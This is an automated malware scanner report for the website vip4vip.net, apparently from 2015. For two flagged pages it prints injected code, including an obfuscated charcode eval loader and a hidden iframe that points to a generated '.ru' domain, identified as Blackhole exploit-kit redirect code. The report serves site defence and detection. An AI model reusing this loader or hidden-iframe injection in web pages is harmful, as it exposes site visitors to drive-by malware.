Malware Scanner report for vip4vip.net

Malicious/Suspicious/Total urls checked: 2/0/10

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "vip4vip.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vip4vip.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://vip4vip.net/	HTTP/1.1 200 OK Date: Mon, 12 Jan 2015 20:05:54 GMT Accept-Ranges: bytes ETag: "db9491f5553cd1:13ddb" Server: Microsoft-IIS/6.0 Content-Length: 100610 Content-Location: http://vip4vip.net/Index.html Content-Type: text/html Last-Modified: Tue, 26 Jun 2012 04:35:32 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: PleskWin X-Powered-By: ASP.NET	clean
http://vip4vip.net/index.html	200 OK Content-Length: 100610 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<script language="javascript" type="text/javascript" src="http://' + location.hostname + ':8880/javascript/newsfeeds.js.php"></' + 'script>\n'); document.write('<script language="javascript" type="text/javascript" src="http://' + location.hostname + ':8880/javascript/promo-flags.js.php"></' + 'script>\n'); window.eval(String.fromCharCode(105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,45,53,59,125,99,97,116,99,1 ... 3044 bytes are skipped ...04,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,119,61,102,59,115,61,91,93,59,125,13,10,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,51,51,51,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,46,102,114,111,109,67,104,97,114,67,111,100,101,40,40,119,91,106,93,47,40,50,45,49,43,106,37,50,41,41,41,59,125,13,10,105,102,40,102,41,101,40,115,41,59)); Decoded script: i=0;try{prototype-5;}catch(z){f=[102,234,110,198,116,210,111,220,32,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,80,41,246,118,194,114,64,104,210,61,232,104,210,115,92,115,202,101,200,47,232,104,210,115,92,81,118,118,194,114,64,108,222,61,232,104,210,115,92,115,202,101,200,37,232,104,210,115,92,81,118,118,194,114,64,116,202,115,232,61,232,104,210,115,92,65,84,108,222,45,232,104,210,115,92,82,84,104,210,59,210,102,80,116,202,115,232,62,96,41,246,116,208,105,230,46,230,101,20 ... 13425 bytes are skipped ....round(+ new Date / 1000); var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports: AntiVir JS/BlacoleRef.BO.2 Avast JS:Iframe-QG [Trj] Ikarus Trojan.JS.Blacole Rising Trojan.Script.JS.BlacoleRef.e nProtect Trojan.JS.Agent.GLM K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.GLM (B) Comodo Exploit.JS.Blacole.DQ DrWeb Exploit.BlackHole.51 Kaspersky Trojan.JS.Iframe.abm Microsoft Trojan:JS/BlacoleRef.BO MicroWorld-eScan Trojan.JS.Agent.GLM Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.vtxhd F-Secure Trojan.JS.Agent.GLM F-Prot JS/Blacole.BV AVG JS/Agent GData Trojan.JS.Agent.GLM Commtouch JS/Blacole.BV BitDefender Trojan.JS.Agent.GLM
http://vip4vip.net/header.js	200 OK Content-Length: 1897 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function writeHeader() { writeHeader(false); } function writeHeader(virtuozo) { document.write('<a target="_blank" href="http://www.parallels.com/plesk/" title="Plesk™" class="topLogo"><img src="/img/common/def_plesk_logo.gif" name="logo" height="50" border="0" width="210" title="Plesk™"></a>'); document.write('<div id="topTxtBlock">'); document.write(' <div id="topBgBlock">'); ... 1313 bytes are skipped ....write(' <a target="_blank" href="http://www.parallels.com"><img src="/img/common/parallels_powered.gif" title="Plesk™"/></a>'); document.write('</div>'); if (virtuozzo) { } } function writeCopyFlag() { document.write('<script language="javascript" type="text/javascript" src="http://' + location.hostname + ':8880/javascript/promo-flags.js.php"></' + 'script>\n'); } Antivirus reports: Ikarus Trojan.JS.Redirector nProtect Trojan.JS.Redirector.AEB TrendMicro-HouseCall TROJ_GEN.RFFH1G3 Emsisoft Trojan.JS.Redirector.AEB (B) Comodo Exploit.JS.Redirect.A ViRobot Trojan.Win32.A.Zbot.1897 MicroWorld-eScan Trojan.JS.Redirector.AEB F-Secure Trojan.JS.Redirector.AEB GData Trojan.JS.Redirector.AEB Commtouch Trojan.UFAR-8 BitDefender Trojan.JS.Redirector.AEB
http://vip4vip.net/test/asp/test_mysql.asp	401 Unauthorized Content-Length: 990 Content-Type: text/html	clean
http://vip4vip.net/test404page.js	404 Not Found Content-Length: 1042 Content-Type: text/html	clean
http://vip4vip.net/test/aspnet/test.aspx	401 Unauthorized Content-Length: 990 Content-Type: text/html	clean
http://vip4vip.net/test/php/test.php	401 Unauthorized Content-Length: 990 Content-Type: text/html	clean
http://vip4vip.net/test/coldfusion/test.cfm	401 Unauthorized Content-Length: 990 Content-Type: text/html	clean
http://vip4vip.net/test/perl/test.pl	401 Unauthorized Content-Length: 990 Content-Type: text/html	clean
http://vip4vip.net/test/python/test.py	401 Unauthorized Content-Length: 990 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vip4vip.net

Result:
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 20:05:54 GMT
Accept-Ranges: bytes
ETag: "db9491f5553cd1:13ddb"
Server: Microsoft-IIS/6.0
Content-Length: 100610
Content-Location: http://vip4vip.net/Index.html
Content-Type: text/html
Last-Modified: Tue, 26 Jun 2012 04:35:32 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: PleskWin
X-Powered-By: ASP.NET

...100610 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: vip4vip.net
Referer: http://www.google.com/search?q=vip4vip.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for vip4vip.net

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools